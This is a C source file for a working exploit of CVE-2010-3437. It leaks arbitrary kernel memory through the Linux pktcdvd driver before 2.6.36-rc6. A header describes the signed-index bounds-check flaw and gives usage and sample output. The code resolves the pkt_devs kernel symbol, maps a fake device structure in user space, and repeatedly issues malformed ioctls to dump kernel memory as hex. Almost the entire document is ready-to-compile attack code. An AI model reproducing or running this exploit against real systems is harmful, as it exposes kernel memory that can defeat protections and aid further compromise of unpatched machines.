Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure

                                                /*
 * cve-2010-3437.c
 *
 * Linux Kernel < 2.6.36-rc6 pktcdvd Kernel Memory Disclosure
 * Jon Oberheide <[email protected]>
 * http://jon.oberheide.org
 * 
 * Information:
 *
 *   https://bugzilla.redhat.com/show_bug.cgi?id=638085
 *
 *   The PKT_CTRL_CMD_STATUS device ioctl retrieves a pointer to a
 *   pktcdvd_device from the global pkt_devs array.  The index into this
 *   array is provided directly by the user and is a signed integer, so the
 *   comparison to ensure that it falls within the bounds of this array will
 *   fail when provided with a negative index.
 *
 * Usage:
 *
 *   $ gcc cve-2010-3437.c -o cve-2010-3437
 *   $ ./cve-2010-3437
 *   usage: ./cve-2010-3437 <address> <length>
 *   $ ./cve-2010-3437 0xc0102290 64
 *   [+] searching for pkt_devs kernel symbol...
 *   [+] found pkt_devs at 0xc086fcc0
 *   [+] opening pktcdvd device...
 *   [+] calculated dereference address of 0x790070c0
 *   [+] mapping page at 0x79007000 for pktcdvd_device dereference...
 *   [+] setting up fake pktcdvd_device structure...
 *   [+] dumping kmem from 0xc0102290 to 0xc01022d0 via malformed ioctls...
 *   [+] dumping kmem to output...
 *
 *   55 89 e5 0f 1f 44 00 00 8b 48 3c 8b 50 04 8b ...
 *   55 89 e5 57 56 53 0f 1f 44 00 00 89 d3 89 e2 ...
 *
 * Notes:
 *
 *   Pass the desired kernel memory address and dump length as arguments.
 *
 *   We can disclose 4 bytes of arbitrary kernel memory per ioctl call by 
 *   specifying a large negative device index, causing the kernel to 
 *   dereference to our fake pktcdvd_device structure in userspace and copy
 *   data to userspace from an attacker-controlled address.  Since only 4 
 *   bytes of kmem are disclosed per ioctl call, large dump sizes may take a
 *   few seconds.
 *
 *   Tested on Ubuntu Lucid 10.04.  32-bit only for now.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/utsname.h>
#include <sys/mman.h>

#define DEV_INDEX -300000000
#define PAGE_SIZE 4096
#define PKT_CTRL_CMD_STATUS 2

struct pkt_ctrl_command {
	uint32_t command;
	int32_t dev_index;
	uint32_t dev;
	uint32_t pkt_dev;
	uint32_t num_devices;
	uint32_t padding;
};

#define PACKET_IOCTL_MAGIC ('X')
#define PACKET_CTRL_CMD _IOWR(PACKET_IOCTL_MAGIC, 1, struct pkt_ctrl_command)

struct block_device {
	uint32_t bd_dev;
} bd;

struct pktcdvd_device {
	struct block_device *bdev;
} pd;

#define MINORBITS 20
#define MKDEV(ma,mi) (((ma) << MINORBITS) | (mi))

uint32_t
new_decode_dev(uint32_t dev)
{
	unsigned major = (dev & 0xfff00) >> 8;
	unsigned minor = (dev & 0xff) | ((dev >> 12) & 0xfff00);
	return MKDEV(major, minor);
}

const char hex_asc[] = "0123456789abcdef";
#define hex_asc_lo(x) hex_asc[((x) & 0x0f)]
#define hex_asc_hi(x) hex_asc[((x) & 0xf0) >> 4]

void
hex_dump_to_buffer(const void *buf, size_t len, int rowsize, int groupsize, char *linebuf, size_t linebuflen, int ascii)
{
	const uint8_t *ptr = buf;
	uint8_t ch;
	int j, lx = 0;
	int ascii_column;

	if (rowsize != 16 && rowsize != 32)
		rowsize = 16;

	if (!len)
		goto nil;
	if (len > rowsize)
		len = rowsize;
	if ((len % groupsize) != 0)
		groupsize = 1;

	switch (groupsize) {
	case 8: {
		const uint64_t *ptr8 = buf;
		int ngroups = len / groupsize;

		for (j = 0; j < ngroups; j++)
			lx += snprintf(linebuf + lx, linebuflen - lx,
				"%16.16llx ", (unsigned long long)*(ptr8 + j));
		ascii_column = 17 * ngroups + 2;
		break;
	}

	case 4: {
		const uint32_t *ptr4 = buf;
		int ngroups = len / groupsize;

		for (j = 0; j < ngroups; j++)
			lx += snprintf(linebuf + lx, linebuflen - lx,
				"%8.8x ", *(ptr4 + j));
		ascii_column = 9 * ngroups + 2;
		break;
	}

	case 2: {
		const uint16_t *ptr2 = buf;
		int ngroups = len / groupsize;

		for (j = 0; j < ngroups; j++)
			lx += snprintf(linebuf + lx, linebuflen - lx,
				"%4.4x ", *(ptr2 + j));
		ascii_column = 5 * ngroups + 2;
		break;
	}

	default:
		for (j = 0; (j < rowsize) && (j < len) && (lx + 4) < linebuflen;
			 j++) {
			ch = ptr[j];
			linebuf[lx++] = hex_asc_hi(ch);
			linebuf[lx++] = hex_asc_lo(ch);
			linebuf[lx++] = ' ';
		}
		ascii_column = 3 * rowsize + 2;
		break;
	}
	if (!ascii)
		goto nil;

	while (lx < (linebuflen - 1) && lx < (ascii_column - 1))
		linebuf[lx++] = ' ';
	for (j = 0; (j < rowsize) && (j < len) && (lx + 2) < linebuflen; j++)
		linebuf[lx++] = (isascii(ptr[j]) && isprint(ptr[j])) ? ptr[j]
				: '.';
nil:
	linebuf[lx++] = '\0';
}

void
print_hex_dump(int rowsize, int groupsize, const void *buf, size_t len, int ascii)
{
	const uint8_t *ptr = buf;
	int i, linelen, remaining = len;
	unsigned char linebuf[200];

	if (rowsize != 16 && rowsize != 32)
		rowsize = 16;

	for (i = 0; i < len; i += rowsize) {
		linelen = ((remaining) < (rowsize) ? (remaining) : (rowsize));
		remaining -= rowsize;
		hex_dump_to_buffer(ptr + i, linelen, rowsize, groupsize,
		linebuf, sizeof(linebuf), ascii);
		printf("%s\n", linebuf);
	}
}

unsigned long
get_kernel_symbol(char *name)
{
	FILE *f;
	unsigned long addr;
	struct utsname ver;
	char dummy, sname[512];
	int ret, rep = 0, oldstyle = 0;

	f = fopen("/proc/kallsyms", "r");
	if (f == NULL) {
		f = fopen("/proc/ksyms", "r");
		if (f == NULL) {
			goto fallback;
		}
		oldstyle = 1;
	}

repeat:
	ret = 0;
	while(ret != EOF) {
		if (!oldstyle) {
			ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
		} else {
			ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
			if (ret == 2) {
				char *p;
				if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
					continue;
				}
				p = strrchr(sname, '_');
				if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
					p = p - 4;
					while (p > (char *)sname && *(p - 1) == '_') {
						p--;
					}
					*p = '\0';
				}
			}
		}
		if (ret == 0) {
			fscanf(f, "%s\n", sname);
			continue;
		}
		if (!strcmp(name, sname)) {
			fclose(f);
			return addr;
		}
	}

	fclose(f);
	if (rep) {
		return 0;
	}
fallback:
	uname(&ver);
	if (strncmp(ver.release, "2.6", 3)) {
		oldstyle = 1;
	}
	sprintf(sname, "/boot/System.map-%s", ver.release);
	f = fopen(sname, "r");
	if (f == NULL) {
		return 0;
	}
	rep = 1;
	goto repeat;
}

void
usage(char **argv)
{
	fprintf(stderr, "usage: %s <address> <length>\n", argv[0]);
	exit(1);
}

int
main(int argc, char **argv)
{
	int fd, ret, length;
	void *mem, *dump, *ptr;
	struct pkt_ctrl_command cmd;
	unsigned long pkt_devs, map_addr, deref_addr;
	unsigned long start_addr, end_addr, curr_addr;

	if (argc < 3) {
		usage(argv);
	}

	start_addr = strtoul(argv[1], NULL, 0);
	length = strtoul(argv[2], NULL, 0);
	end_addr = start_addr + length;

	dump = malloc(length);
	if (!dump) {
		printf("[-] failed to allocate memory for kmem dump\n");
		exit(1);
	}
	memset(dump, 0, length);

	printf("[+] searching for pkt_devs kernel symbol...\n");

	pkt_devs = get_kernel_symbol("pkt_devs");
	if (!pkt_devs) {
		printf("[-] could not find pkt_devs kernel symbol\n");
		exit(1);
	}
	
	printf("[+] found pkt_devs at %p\n", (void *) pkt_devs);

	printf("[+] opening pktcdvd device...\n");

	fd = open("/dev/pktcdvd/control", O_RDWR);
	if (fd < 0) {
		printf("[-] open of pktcdvd device failed\n");
		exit(1);
	}

	deref_addr = pkt_devs + (DEV_INDEX * sizeof(void *));
	map_addr = deref_addr & ~(PAGE_SIZE-1);

	printf("[+] calculated dereference address of %p\n", (void *) deref_addr);
	printf("[+] mapping page at %p for pktcdvd_device dereference...\n", (void *) map_addr);

	mem = mmap((void *) map_addr, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
	if (mem == MAP_FAILED) {
		printf("[-] mmap failed\n");
		exit(1);
	}

	printf("[+] setting up fake pktcdvd_device structure...\n");

	*(unsigned long *) deref_addr = (unsigned long) &pd;

	printf("[+] dumping kmem from %p to %p via malformed ioctls...\n", (void *) start_addr, (void *) end_addr);

	memset(&cmd, 0, sizeof(cmd));
	cmd.command = PKT_CTRL_CMD_STATUS;
	cmd.dev_index = DEV_INDEX;

	ptr = dump;
	curr_addr = start_addr;

	while (curr_addr < end_addr) {
		pd.bdev = (struct block_device *) curr_addr;

		ret = ioctl(fd, PACKET_CTRL_CMD, &cmd);
		if (ret < 0) {
			printf("[-] ioctl of pktcdvd device failed\n");
			exit(1);
		}

		*(uint32_t *) ptr = (uint32_t) new_decode_dev(cmd.dev);

		curr_addr += sizeof(uint32_t);
		ptr += sizeof(uint32_t);
	}

	printf("[+] dumping kmem to output...\n");

	printf("\n");
	print_hex_dump(32, 1, dump, length, 1);
	printf("\n");

	return 0;
}